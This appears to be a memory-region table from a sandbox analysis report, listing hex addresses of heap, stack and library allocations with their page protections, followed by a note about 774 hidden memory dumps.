22565B0D000
|
heap
|
page read and write
|
||
25EB02A0000
|
heap
|
page read and write
|
||
210C30E1000
|
heap
|
page read and write
|
||
7FFD9B636000
|
trusted library allocation
|
page execute and read and write
|
||
225659BA000
|
heap
|
page read and write
|
||
22563100000
|
heap
|
page read and write
|
||
210C314F000
|
heap
|
page read and write
|
||
210C30E9000
|
heap
|
page read and write
|
||
25EAE793000
|
heap
|
page read and write
|
||
DDBF7F8000
|
stack
|
page read and write
|
||
1D40BC01000
|
trusted library allocation
|
page read and write
|
||
1D403C01000
|
trusted library allocation
|
page read and write
|
||
2851DC97000
|
heap
|
page read and write
|
||
210C12B1000
|
heap
|
page read and write
|
||
54AEFFE000
|
stack
|
page read and write
|
||
A2C4DFE000
|
stack
|
page read and write
|
||
28503965000
|
heap
|
page read and write
|
||
22565250000
|
heap
|
page read and write
|
||
22565D07000
|
heap
|
page read and write
|
||
22565CD0000
|
heap
|
page read and write
|
||
25EAE3F4000
|
heap
|
page read and write
|
||
22564ECE000
|
heap
|
page read and write
|
||
2256594B000
|
heap
|
page read and write
|
||
22564ED7000
|
heap
|
page read and write
|
||
897E88B000
|
stack
|
page read and write
|
||
28505A38000
|
trusted library allocation
|
page read and write
|
||
210C3070000
|
heap
|
page read and write
|
||
F96B8FC000
|
stack
|
page read and write
|
||
A2C4EFF000
|
stack
|
page read and write
|
||
245F4690000
|
heap
|
page read and write
|
||
24580094000
|
trusted library allocation
|
page read and write
|
||
245F47AB000
|
heap
|
page read and write
|
||
25EAC9EB000
|
heap
|
page read and write
|
||
22565CDB000
|
heap
|
page read and write
|
||
25EACA30000
|
heap
|
page read and write
|
||
210C326E000
|
heap
|
page read and write
|
||
7FFD9B60C000
|
trusted library allocation
|
page execute and read and write
|
||
210C307C000
|
heap
|
page read and write
|
||
7FFD9B732000
|
trusted library allocation
|
page read and write
|
||
25EAE826000
|
heap
|
page read and write
|
||
22564E9D000
|
heap
|
page read and write
|
||
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
There are 774 hidden memdumps, click here to show them.